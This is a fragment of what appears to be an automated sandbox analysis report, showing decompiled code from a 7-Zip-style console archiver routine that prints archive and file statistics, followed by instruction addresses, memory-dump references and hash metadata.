												if( *(_t828 - 0x20) != 0) {
													goto L93;
												}
												_t466 =  *(_t828 - 0x94);
												__eflags = _t466 |  *(_t828 - 0x90);
												if((_t466 |  *(_t828 - 0x90)) != 0) {
													fputs("Folders: ",  *_t819);
													E003B1FA0(E003B2201(_t819,  *(_t828 - 0x94),  *(_t828 - 0x90)));
													_t466 =  *(_t828 - 0x94);
												}
												__eflags =  *((intOrPtr*)(_t828 - 0x8c)) - 1;
												if( *((intOrPtr*)(_t828 - 0x8c)) != 1) {
													L87:
													fputs("Files: ",  *_t819); // executed
													_t468 = E003B2201(_t819,  *((intOrPtr*)(_t828 - 0x8c)),  *(_t828 - 0x88)); // executed
													E003B1FA0(_t468);
													__eflags =  *(_t828 - 0x84) |  *(_t828 - 0x80);
													if(( *(_t828 - 0x84) |  *(_t828 - 0x80)) != 0) {
														fputs("Alternate Streams: ",  *_t819);
														E003B1FA0(E003B2201(_t819,  *(_t828 - 0x84),  *(_t828 - 0x80)));
														fputs("Alternate Streams Size: ",  *_t819);
														E003B1FA0(E003B2201(_t819,  *((intOrPtr*)(_t828 - 0xa4)),  *((intOrPtr*)(_t828 - 0xa0))));
													}
													goto L89;
												} else {
													__eflags =  *(_t828 - 0x88);
													if( *(_t828 - 0x88) != 0) {
														goto L87;
													}
													__eflags = _t466 |  *(_t828 - 0x90);
													if((_t466 |  *(_t828 - 0x90)) != 0) {
														goto L87;
													}
													__eflags =  *(_t828 - 0x84) |  *(_t828 - 0x80);
													if(( *(_t828 - 0x84) |  *(_t828 - 0x80)) == 0) {
														L89:
														fputs("Size:       ",  *_t819); // executed
														_t473 = E003B2201(_t819,  *((intOrPtr*)(_t828 - 0xac)),  *((intOrPtr*)(_t828 - 0xa8))); // executed
														 *(_t828 - 0x24) = _t473;
														E003B1FA0(_t473);
														fputs("Compressed: ",  *( *(_t828 - 0x24))); // executed
														_t477 = E003B2201( *(_t828 - 0x24),  *((intOrPtr*)(_t828 - 0x9c)),  *((intOrPtr*)(_t828 - 0x98))); // executed
														E003B1FA0(_t477);
														__eflags =  *(_t828 - 0x1c);
														if( *(_t828 - 0x1c) != 0) {
															E003B1FA0(_t819);
															L003E5F0E(_t819, _t828 - 0x3ec);
														}
														goto L93;
													}
													goto L87;
												}
											}
											L76:
											 *((intOrPtr*)(_t828 - 0x28)) = 2;
											goto L77;
										}
										__eflags = _t819;
										 *(_t828 - 0xd) = 1;
										if(_t819 == 0) {
											goto L76;
										}
										E003B1FA0(_t819);
										__eflags =  *(_t823 + 0x140) |  *(_t823 + 0x144);
										if(( *(_t823 + 0x140) |  *(_t823 + 0x144)) == 0) {
											goto L76;
										}
										fputs("Open Errors: ",  *_t819);
										E003B1FA0(E003B2201(_t819,  *(_t823 + 0x140),  *(_t823 + 0x144)));
										goto L75;
									}
									fputs("Archives with Errors: ",  *_t819);
									E003B1FA0(E003B2201(_t819,  *(_t823 + 0x130),  *(_t823 + 0x134)));
									goto L65;
								}
							} else {
								E003B1FA0(_t819);
								__eflags =  *(_t823 + 0x114);
								if( *(_t823 + 0x114) > 0) {
									L58:
									fputs("Archives: ",  *_t819);
									_t242 = _t823 + 0x110; // 0x110
									E003B1FA0(E003B2201(_t819,  *_t242,  *((intOrPtr*)(_t242 + 4))));
									fputs("OK archives: ",  *_t819);
									E003B1FA0(E003B2201(_t819,  *((intOrPtr*)(_t823 + 0x120)),  *((intOrPtr*)(_t823 + 0x124))));
									goto L59;
								}
								__eflags =  *((intOrPtr*)(_t823 + 0x110)) - 1;
								if( *((intOrPtr*)(_t823 + 0x110)) <= 1) {
									goto L59;
								}
								goto L58;
							}
						}
					}
					E003EF23F(_t828 - 0x78);
					_push(_t828 - 0x2b0);
					E003B1524(_t828 - 0x78);
					E003EF23F(_t828 - 0x38);
					_push(_t828 - 0x2b0);
					E003B1524(_t828 - 0x38);
					goto L38;
				}
				if(E003C06DA(_t828 - 0x2f8) == 0) {
					__eflags =  *((intOrPtr*)(_t828 - 0x2f8)) - 9;
					if(__eflags != 0) {
						_t807 = 7;
						E003EA37B(_t807);
						goto L105;
					}
					E003EA312(_t828 - 0x5ac, __eflags);
					__eflags =  *(_t828 - 0x18) - __ebx;
					 *(_t828 - 4) = 0x19;
					if( *(_t828 - 0x18) != __ebx) {
						_t578 =  *(_t828 - 0x14) - 1;
						__eflags = _t578;
						 *(_t828 - 0x4f8) = _t578;
					}
					_t825 =  *0x43a898; // 0x43a5a0
					_t820 =  *0x43a894; // 0x43a5b0
					E003D6B24(_t828 - 0x4c8);
					 *(_t828 - 0x500) =  *(_t828 - 0x18);
					 *((char*)(_t828 - 0x473)) =  *(_t828 - 0x338);
					 *(_t828 - 0x4b8) = _t614;
					 *(_t828 - 0x4f4) = _t820;
					 *(_t828 - 0x4f0) = _t825;
					E003B276E(_t828 - 0x470, _t828 - 0x324);
					E003B2690(_t828 - 0x38);
					_push(_t828 - 0x5ac);
					_push(_t828 - 0x38);
					 *(_t828 - 4) = 0x1a;
					 *(_t828 - 0x20) = E003D29D4(_t828 - 0x314, _t828 - 0x150, __eflags);
					L003E9BB0(_t828 - 0x98, __eflags);
					 *(_t828 - 4) = 0x1b;
					E003B276E(_t828 - 0x94, _t828 - 0x38);
					_t569 =  *0x43a894; // 0x43a5b0
					_t778 = _t569;
					__eflags = _t778 - _t614;
					if(_t778 == _t614) {
						_t778 =  *0x43a898; // 0x43a5a0
					}
					_push( *(_t828 - 0x338));
					_push(_t778);
					_push(_t569);
					_push(_t828 - 0x98);
					asm("sbb edx, edx");
					 *((intOrPtr*)(_t828 - 0x28)) = E003EA4C7( *(_t828 - 0x20),  ~(_t828 - 0x5ac) & _t828 - 0x000005a4);
					 *(_t828 - 4) = 0x1c;
					E003B1E40(E003B1E40(E003D0A72(_t614, _t828 - 0x88),  *(_t828 - 0x94)),  *((intOrPtr*)(_t828 - 0x38)));
					 *(_t828 - 4) = 8;
					E003EAE14(_t614, _t828 - 0x5ac);
					goto L105;
				} else {
					if( *((char*)(_t828 - 0x257)) != 0) {
						_t834 =  *((intOrPtr*)(_t828 - 0x198)) - __ebx;
						if( *((intOrPtr*)(_t828 - 0x198)) == __ebx) {
							E003B302D(_t828 - 0x19c, "7zCon.sfx");
						}
					}
					E003E80D3(_t828 - 0x464, _t834);
					_t580 =  *0x43a894; // 0x43a5b0
					_t826 =  *(_t828 - 0x18);
					 *(_t828 - 0x3ac) = _t580;
					_t581 =  *0x43a898; // 0x43a5a0
					 *(_t828 - 4) = 0x15;
					 *(_t828 - 0x3a8) = _t581;
					 *(_t828 - 0x3b8) = _t826;
					if( *((char*)(_t828 - 0x2e8)) == 0) {
						L8:
						_t15 = _t828 - 0xd;
						 *_t15 =  *(_t828 - 0xd) & 0x00000000;
						__eflags =  *_t15;
						L9:
						 *((char*)(_t828 - 0x39a)) =  *(_t828 - 0xd);
						E003B2F2F(_t828 - 0x398, _t828 - 0x2e4);
						E003EA185(_t828 - 0x594, _t836);
						 *((intOrPtr*)(_t828 - 0x4cc)) =  *((intOrPtr*)(_t828 - 0x114));
						 *(_t828 - 4) = 0x16;
						 *(_t828 - 0x4d0) =  *(_t828 - 0x1c);
						if(_t826 != _t614) {
							 *((intOrPtr*)(_t828 - 0x4e0)) =  *(_t828 - 0x14) - 1;
						}
						 *((char*)(_t828 - 0x473)) =  *(_t828 - 0xd);
						if( *((char*)(_t828 - 0x2e8)) == 0) {
							L14:
							_t34 = _t828 - 0x472;
							 *_t34 =  *(_t828 - 0x472) & 0x00000000;
							__eflags =  *_t34;
							L15:
							E003B2F2F(_t828 - 0x470, _t828 - 0x2e4);
							_t827 =  *0x43a898; // 0x43a5a0
							_t614 =  *0x43a894; // 0x43a5b0
							 *((char*)(_t828 - 0x4d4)) =  *((intOrPtr*)(_t828 - 0x252));
							E003D6B24(_t828 - 0x4b0);
							 *(_t828 - 0x4a0) =  *(_t828 - 0x4a0) & 0x00000000;
							 *(_t828 - 0x4dc) = _t614;
							 *(_t828 - 0x4d8) = _t827;
							 *(_t828 - 0x4e8) =  *(_t828 - 0x18);
							L003E9BB0(_t828 - 0x48, _t840);
							 *(_t828 - 4) = 0x17;
							 *(_t828 - 0x20) = E003DE64C(_t816, _t828 - 0xc0, _t828 - 0x2f4, _t828 - 0x314, _t828 - 0x258, _t828 - 0x48, _t828 - 0x464, _t828 - 0x594, 1);
							if( *(_t828 - 0x4e8) != 0) {
								E003EB5FA(_t828 - 0x58c, _t816, 1);
							}
							_t602 =  *0x43a894; // 0x43a5b0
							_t791 = _t602;
							if(_t791 == 0) {
								_t791 =  *0x43a898; // 0x43a5a0
							}
							_push(1);
							_push(_t791);
							_push(_t602);
							_push(_t828 - 0x48);
							asm("sbb edx, edx");
							 *((intOrPtr*)(_t828 - 0x28)) = E003EA4C7( *(_t828 - 0x20),  ~(_t828 - 0x594) & _t828 - 0x0000058c);
							 *(_t828 - 4) = 0x18;
							E003B1E40(E003D0A72(_t614, _t828 - 0x38),  *((intOrPtr*)(_t828 - 0x44)));
							 *(_t828 - 4) = 0x15;
							E003EADC0(_t614, _t828 - 0x594);
							 *(_t828 - 4) = 8;
							E003E8222(_t828 - 0x464);
							goto L105;
						}
						_t840 =  *((intOrPtr*)(_t828 - 0x2e0)) - _t614;
						if( *((intOrPtr*)(_t828 - 0x2e0)) != _t614) {
							goto L14;
						} else {
							 *(_t828 - 0x472) = 1;
							goto L15;
						}
					}
					_t836 =  *((intOrPtr*)(_t828 - 0x2e0)) - _t614;
					if( *((intOrPtr*)(_t828 - 0x2e0)) == _t614) {
						goto L8;
					} else {
						 *(_t828 - 0xd) = 1;
						goto L9;
					}
				}
			}







































                                                                                                    0x003e8e2a
                                                                                                    0x003e8e2a
                                                                                                    0x003e8e31
                                                                                                    0x003e9193
                                                                                                    0x003e9196
                                                                                                    0x003e9199
                                                                                                    0x003e919c
                                                                                                    0x003e919f
                                                                                                    0x003e91a2
                                                                                                    0x003e91a5
                                                                                                    0x003e91ac
                                                                                                    0x003e91b2
                                                                                                    0x003e91b6
                                                                                                    0x003e91eb
                                                                                                    0x003e91f6
                                                                                                    0x003e91fb
                                                                                                    0x003e920b
                                                                                                    0x003e9212
                                                                                                    0x003e9214
                                                                                                    0x003e921a
                                                                                                    0x003e9226
                                                                                                    0x003e922f
                                                                                                    0x003e9239
                                                                                                    0x003e923b
                                                                                                    0x003e9241
                                                                                                    0x003e9243
                                                                                                    0x003e924a
                                                                                                    0x003e9255
                                                                                                    0x003e925b
                                                                                                    0x003e925b
                                                                                                    0x003e924a
                                                                                                    0x003e9260
                                                                                                    0x003e9266
                                                                                                    0x003e926c
                                                                                                    0x003e9272
                                                                                                    0x003e9278
                                                                                                    0x003e927e
                                                                                                    0x003e9284
                                                                                                    0x003e928a
                                                                                                    0x003e9290
                                                                                                    0x003e9296
                                                                                                    0x003e929c
                                                                                                    0x003e92a2
                                                                                                    0x003e92a8
                                                                                                    0x003e92ab
                                                                                                    0x003e92b3
                                                                                                    0x003e92b8
                                                                                                    0x003e92c7
                                                                                                    0x003e92cb
                                                                                                    0x003e92cf
                                                                                                    0x003e92d0
                                                                                                    0x003e92d7
                                                                                                    0x003e92db
                                                                                                    0x003e92e0
                                                                                                    0x003e92e3
                                                                                                    0x003e92ea
                                                                                                    0x003e92ef
                                                                                                    0x003e92f6
                                                                                                    0x003e9300
                                                                                                    0x003e9300
                                                                                                    0x003e9305
                                                                                                    0x003e9308
                                                                                                    0x003e930a
                                                                                                    0x003e9311
                                                                                                    0x003e931f
                                                                                                    0x003e9320
                                                                                                    0x003e9320
                                                                                                    0x003e9311
                                                                                                    0x003e932b
                                                                                                    0x003e932f
                                                                                                    0x003e9334
                                                                                                    0x003e9337
                                                                                                    0x003e9a22
                                                                                                    0x003e9a25
                                                                                                    0x003e9a29
                                                                                                    0x003e9a31
                                                                                                    0x003e9a35
                                                                                                    0x003e9a3a
                                                                                                    0x003e9a41
                                                                                                    0x003e9a4c
                                                                                                    0x003e9a4c
                                                                                                    0x003e9a5f
                                                                                                    0x003e9a65
                                                                                                    0x003e9a6f
                                                                                                    0x003e9a74
                                                                                                    0x003e9a77
                                                                                                    0x003e9a7b
                                                                                                    0x003e9a7d
                                                                                                    0x003e9a82
                                                                                                    0x003e9a82
                                                                                                    0x003e9a8b
                                                                                                    0x003e9a8f
                                                                                                    0x003e9a9b
                                                                                                    0x003e9aa0
                                                                                                    0x003e9aaa
                                                                                                    0x003e9aaf
                                                                                                    0x003e9ab6
                                                                                                    0x003e9abb
                                                                                                    0x003e9ac4
                                                                                                    0x003e9acc
                                                                                                    0x003e933d
                                                                                                    0x003e933d
                                                                                                    0x003e933d
                                                                                                    0x003e9341
                                                                                                    0x003e991c
                                                                                                    0x003e9920
                                                                                                    0x003e9927
                                                                                                    0x003e992e
                                                                                                    0x003e9937
                                                                                                    0x003e993e
                                                                                                    0x003e9947
                                                                                                    0x003e9948
                                                                                                    0x003e994b
                                                                                                    0x003e9951
                                                                                                    0x003e9954
                                                                                                    0x003e9957
                                                                                                    0x003e995c
                                                                                                    0x003e9968
                                                                                                    0x003e996c
                                                                                                    0x003e9975
                                                                                                    0x003e997b
                                                                                                    0x003e997f
                                                                                                    0x003e9986
                                                                                                    0x003e998c
                                                                                                    0x003e9993
                                                                                                    0x003e9994
                                                                                                    0x003e9999
                                                                                                    0x003e99a0
                                                                                                    0x003e99a8
                                                                                                    0x003e99de
                                                                                                    0x003e99de
                                                                                                    0x003e99e1
                                                                                                    0x003e99e8
                                                                                                    0x003e99e8
                                                                                                    0x003e99ef
                                                                                                    0x003e99f3
                                                                                                    0x003e9a03
                                                                                                    0x003e9a16
                                                                                                    0x003e9a16
                                                                                                    0x003e9a1b
                                                                                                    0x00000000
                                                                                                    0x003e9a1b
                                                                                                    0x003e99e3
                                                                                                    0x003e99e6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e99e6
                                                                                                    0x003e99aa
                                                                                                    0x003e99ad
                                                                                                    0x003e99b4
                                                                                                    0x003e99b6
                                                                                                    0x003e99c6
                                                                                                    0x003e99d9
                                                                                                    0x00000000
                                                                                                    0x003e99d9
                                                                                                    0x003e99af
                                                                                                    0x003e99b2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e99b2
                                                                                                    0x003e9347
                                                                                                    0x003e934c
                                                                                                    0x003e9352
                                                                                                    0x003e9355
                                                                                                    0x003e9357
                                                                                                    0x003e935b
                                                                                                    0x003e9368
                                                                                                    0x003e9368
                                                                                                    0x003e935d
                                                                                                    0x003e9364
                                                                                                    0x003e9364
                                                                                                    0x003e936a
                                                                                                    0x003e936c
                                                                                                    0x003e9370
                                                                                                    0x003e9373
                                                                                                    0x003e9378
                                                                                                    0x003e9378
                                                                                                    0x003e9381
                                                                                                    0x003e9387
                                                                                                    0x003e9394
                                                                                                    0x003e9398
                                                                                                    0x003e93ae
                                                                                                    0x003e93b3
                                                                                                    0x003e93ba
                                                                                                    0x003e93bd
                                                                                                    0x003e93c9
                                                                                                    0x003e93d2
                                                                                                    0x003e93d8
                                                                                                    0x003e93dd
                                                                                                    0x003e93dd
                                                                                                    0x003e93de
                                                                                                    0x003e93de
                                                                                                    0x003e93ea
                                                                                                    0x003e93fb
                                                                                                    0x003e93fc
                                                                                                    0x003e9400
                                                                                                    0x003e940b
                                                                                                    0x003e9412
                                                                                                    0x003e9418
                                                                                                    0x003e941e
                                                                                                    0x003e9424
                                                                                                    0x003e942d
                                                                                                    0x003e9440
                                                                                                    0x003e9448
                                                                                                    0x003e9453
                                                                                                    0x003e9457
                                                                                                    0x003e945c
                                                                                                    0x003e9462
                                                                                                    0x003e9466
                                                                                                    0x003e9469
                                                                                                    0x003e9477
                                                                                                    0x003e9480
                                                                                                    0x003e9488
                                                                                                    0x003e9488
                                                                                                    0x003e9499
                                                                                                    0x003e949d
                                                                                                    0x003e94a0
                                                                                                    0x003e94a3
                                                                                                    0x003e94a8
                                                                                                    0x003e94b0
                                                                                                    0x003e94b1
                                                                                                    0x003e94b4
                                                                                                    0x003e94b6
                                                                                                    0x003e94c1
                                                                                                    0x003e94c5
                                                                                                    0x003e94c6
                                                                                                    0x003e94cd
                                                                                                    0x003e94d1
                                                                                                    0x003e94d8
                                                                                                    0x003e94df
                                                                                                    0x003e94e4
                                                                                                    0x003e94ea
                                                                                                    0x003e94ed
                                                                                                    0x003e94f1
                                                                                                    0x003e94f4
                                                                                                    0x003e94f4
                                                                                                    0x003e94f9
                                                                                                    0x003e94fc
                                                                                                    0x003e94fe
                                                                                                    0x003e9503
                                                                                                    0x003e9505
                                                                                                    0x003e9509
                                                                                                    0x003e950c
                                                                                                    0x003e951b
                                                                                                    0x003e9522
                                                                                                    0x003e952a
                                                                                                    0x003e9534
                                                                                                    0x003e9534
                                                                                                    0x003e9539
                                                                                                    0x003e953c
                                                                                                    0x003e953e
                                                                                                    0x003e953e
                                                                                                    0x003e953c
                                                                                                    0x003e9545
                                                                                                    0x003e954b
                                                                                                    0x003e954f
                                                                                                    0x003e9551
                                                                                                    0x003e95b5
                                                                                                    0x003e95bb
                                                                                                    0x003e95c1
                                                                                                    0x003e95c3
                                                                                                    0x003e95c5
                                                                                                    0x003e95c9
                                                                                                    0x003e95d2
                                                                                                    0x003e95eb
                                                                                                    0x003e95eb
                                                                                                    0x003e95c9
                                                                                                    0x003e95f6
                                                                                                    0x003e95fc
                                                                                                    0x003e962f
                                                                                                    0x003e962f
                                                                                                    0x003e9631
                                                                                                    0x003e9639
                                                                                                    0x003e9639
                                                                                                    0x003e963f
                                                                                                    0x003e9642
                                                                                                    0x003e964b
                                                                                                    0x003e964e
                                                                                                    0x003e9663
                                                                                                    0x003e9663
                                                                                                    0x003e966e
                                                                                                    0x003e9674
                                                                                                    0x003e9678
                                                                                                    0x003e9683
                                                                                                    0x003e9689
                                                                                                    0x003e9692
                                                                                                    0x003e96ab
                                                                                                    0x003e96ab
                                                                                                    0x003e9689
                                                                                                    0x003e9674
                                                                                                    0x00000000
                                                                                                    0x003e95fe
                                                                                                    0x003e95fe
                                                                                                    0x003e9600
                                                                                                    0x003e9604
                                                                                                    0x003e96b0
                                                                                                    0x003e96b6
                                                                                                    0x003e96bc
                                                                                                    0x003e9700
                                                                                                    0x003e9700
                                                                                                    0x003e9704
                                                                                                    0x003e970d
                                                                                                    0x003e970d
                                                                                                    0x003e970f
                                                                                                    0x003e98c6
                                                                                                    0x003e98cc
                                                                                                    0x003e98d8
                                                                                                    0x003e98e4
                                                                                                    0x003e98e8
                                                                                                    0x003e98f3
                                                                                                    0x003e98f7
                                                                                                    0x003e98fc
                                                                                                    0x003e98fe
                                                                                                    0x003e9902
                                                                                                    0x003e990b
                                                                                                    0x003e990b
                                                                                                    0x00000000
                                                                                                    0x003e9902
                                                                                                    0x003e971b
                                                                                                    0x003e9721
                                                                                                    0x003e988a
                                                                                                    0x003e988c
                                                                                                    0x003e9897
                                                                                                    0x003e9897
                                                                                                    0x003e989d
                                                                                                    0x003e98a0
                                                                                                    0x003e98a9
                                                                                                    0x003e98ac
                                                                                                    0x003e98c1
                                                                                                    0x003e98c1
                                                                                                    0x00000000
                                                                                                    0x003e98a0
                                                                                                    0x003e972d
                                                                                                    0x003e972d
                                                                                                    0x003e9733
                                                                                                    0x003e9736
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e973c
                                                                                                    0x003e9740
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e9746
                                                                                                    0x003e974e
                                                                                                    0x003e9754
                                                                                                    0x003e975d
                                                                                                    0x003e9776
                                                                                                    0x003e977b
                                                                                                    0x003e977b
                                                                                                    0x003e9781
                                                                                                    0x003e9788
                                                                                                    0x003e97a6
                                                                                                    0x003e97ad
                                                                                                    0x003e97bf
                                                                                                    0x003e97c6
                                                                                                    0x003e97d1
                                                                                                    0x003e97d4
                                                                                                    0x003e97dd
                                                                                                    0x003e97f3
                                                                                                    0x003e97ff
                                                                                                    0x003e9818
                                                                                                    0x003e9818
                                                                                                    0x00000000
                                                                                                    0x003e978a
                                                                                                    0x003e978a
                                                                                                    0x003e9791
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e9793
                                                                                                    0x003e9799
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e97a1
                                                                                                    0x003e97a4
                                                                                                    0x003e981d
                                                                                                    0x003e9824
                                                                                                    0x003e9836
                                                                                                    0x003e983d
                                                                                                    0x003e9840
                                                                                                    0x003e984f
                                                                                                    0x003e9862
                                                                                                    0x003e9869
                                                                                                    0x003e986e
                                                                                                    0x003e9872
                                                                                                    0x003e9876
                                                                                                    0x003e9883
                                                                                                    0x003e9883
                                                                                                    0x00000000
                                                                                                    0x003e9872
                                                                                                    0x00000000
                                                                                                    0x003e97a4
                                                                                                    0x003e9788
                                                                                                    0x003e9706
                                                                                                    0x003e9706
                                                                                                    0x00000000
                                                                                                    0x003e9706
                                                                                                    0x003e96be
                                                                                                    0x003e96c0
                                                                                                    0x003e96c4
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e96c8
                                                                                                    0x003e96d3
                                                                                                    0x003e96d9
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e96e2
                                                                                                    0x003e96fb
                                                                                                    0x00000000
                                                                                                    0x003e96fb
                                                                                                    0x003e9611
                                                                                                    0x003e962a
                                                                                                    0x00000000
                                                                                                    0x003e962a
                                                                                                    0x003e9553
                                                                                                    0x003e9555
                                                                                                    0x003e955a
                                                                                                    0x003e9561
                                                                                                    0x003e956c
                                                                                                    0x003e9573
                                                                                                    0x003e9576
                                                                                                    0x003e958b
                                                                                                    0x003e9597
                                                                                                    0x003e95b0
                                                                                                    0x00000000
                                                                                                    0x003e95b0
                                                                                                    0x003e9563
                                                                                                    0x003e956a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e956a
                                                                                                    0x003e9551
                                                                                                    0x003e9337
                                                                                                    0x003e91bb
                                                                                                    0x003e91c9
                                                                                                    0x003e91ca
                                                                                                    0x003e91d2
                                                                                                    0x003e91e0
                                                                                                    0x003e91e1
                                                                                                    0x00000000
                                                                                                    0x003e91e1
                                                                                                    0x003e8e44
                                                                                                    0x003e9045
                                                                                                    0x003e904c
                                                                                                    0x003e9186
                                                                                                    0x003e9187
                                                                                                    0x00000000
                                                                                                    0x003e9187
                                                                                                    0x003e9058
                                                                                                    0x003e905d
                                                                                                    0x003e9060
                                                                                                    0x003e9064
                                                                                                    0x003e9069
                                                                                                    0x003e9069
                                                                                                    0x003e906a
                                                                                                    0x003e906a
                                                                                                    0x003e9070
                                                                                                    0x003e9076
                                                                                                    0x003e9082
                                                                                                    0x003e9090
                                                                                                    0x003e909c
                                                                                                    0x003e90a9
                                                                                                    0x003e90af
                                                                                                    0x003e90b5
                                                                                                    0x003e90bb
                                                                                                    0x003e90c3
                                                                                                    0x003e90d4
                                                                                                    0x003e90d8
                                                                                                    0x003e90df
                                                                                                    0x003e90ee
                                                                                                    0x003e90f1
                                                                                                    0x003e9100
                                                                                                    0x003e9104
                                                                                                    0x003e9109
                                                                                                    0x003e910e
                                                                                                    0x003e9110
                                                                                                    0x003e9112
                                                                                                    0x003e9114
                                                                                                    0x003e9114
                                                                                                    0x003e911a
                                                                                                    0x003e9128
                                                                                                    0x003e912c
                                                                                                    0x003e9133
                                                                                                    0x003e913a
                                                                                                    0x003e9143
                                                                                                    0x003e914c
                                                                                                    0x003e9163
                                                                                                    0x003e9169
                                                                                                    0x003e9174
                                                                                                    0x00000000
                                                                                                    0x003e8e4a
                                                                                                    0x003e8e51
                                                                                                    0x003e8e53
                                                                                                    0x003e8e59
                                                                                                    0x003e8e66
                                                                                                    0x003e8e66
                                                                                                    0x003e8e59
                                                                                                    0x003e8e71
                                                                                                    0x003e8e76
                                                                                                    0x003e8e7b
                                                                                                    0x003e8e85
                                                                                                    0x003e8e8b
                                                                                                    0x003e8e90
                                                                                                    0x003e8e94
                                                                                                    0x003e8e9a
                                                                                                    0x003e8ea0
                                                                                                    0x003e8eb0
                                                                                                    0x003e8eb0
                                                                                                    0x003e8eb0
                                                                                                    0x003e8eb0
                                                                                                    0x003e8eb4
                                                                                                    0x003e8ebd
                                                                                                    0x003e8eca
                                                                                                    0x003e8ed5
                                                                                                    0x003e8ee2
                                                                                                    0x003e8eeb
                                                                                                    0x003e8eef
                                                                                                    0x003e8ef5
                                                                                                    0x003e8efb
                                                                                                    0x003e8efb
                                                                                                    0x003e8f0b
                                                                                                    0x003e8f11
                                                                                                    0x003e8f24
                                                                                                    0x003e8f24
                                                                                                    0x003e8f24
                                                                                                    0x003e8f24
                                                                                                    0x003e8f2b
                                                                                                    0x003e8f38
                                                                                                    0x003e8f43
                                                                                                    0x003e8f49
                                                                                                    0x003e8f55
                                                                                                    0x003e8f5b
                                                                                                    0x003e8f63
                                                                                                    0x003e8f6d
                                                                                                    0x003e8f73
                                                                                                    0x003e8f79
                                                                                                    0x003e8f7f
                                                                                                    0x003e8fb5
                                                                                                    0x003e8fc5
                                                                                                    0x003e8fc8
                                                                                                    0x003e8fd2
                                                                                                    0x003e8fd2
                                                                                                    0x003e8fd7
                                                                                                    0x003e8fdc
                                                                                                    0x003e8fe0
                                                                                                    0x003e8fe2
                                                                                                    0x003e8fe2
                                                                                                    0x003e8fe8
                                                                                                    0x003e8fea
                                                                                                    0x003e8fee
                                                                                                    0x003e8ffa
                                                                                                    0x003e9001
                                                                                                    0x003e900a
                                                                                                    0x003e9010
                                                                                                    0x003e901c
                                                                                                    0x003e9022
                                                                                                    0x003e902c
                                                                                                    0x003e9037
                                                                                                    0x003e903b
                                                                                                    0x00000000
                                                                                                    0x003e903b
                                                                                                    0x003e8f13
                                                                                                    0x003e8f19
                                                                                                    0x00000000
                                                                                                    0x003e8f1b
                                                                                                    0x003e8f1b
                                                                                                    0x00000000
                                                                                                    0x003e8f1b
                                                                                                    0x003e8f19
                                                                                                    0x003e8ea2
                                                                                                    0x003e8ea8
                                                                                                    0x00000000
                                                                                                    0x003e8eaa
                                                                                                    0x003e8eaa
                                                                                                    0x00000000
                                                                                                    0x003e8eaa
                                                                                                    0x003e8ea8

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputs$ExceptionThrow
                                                                                                    • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings: $S
                                                                                                    • API String ID: 3665150552-3874897568
                                                                                                    • Opcode ID: ac288d7e87b2130196f2962e6be761396c5fe21acd91dd39cb2ef2d55c3cdb69
                                                                                                    • Instruction ID: 193a9c56cea894a4904217fc9837aecb766a6fbb009d1bc57241656dbf2fa374
                                                                                                    • Opcode Fuzzy Hash: ac288d7e87b2130196f2962e6be761396c5fe21acd91dd39cb2ef2d55c3cdb69
                                                                                                    • Instruction Fuzzy Hash: 4D52A031D002A8DFCF27EBA5C855BEEBBB5AF44304F14429AE1496B291DB346E84CF11
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E8754 Relevance: 44.3, APIs: 16, Strings: 9, Instructions: 569COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
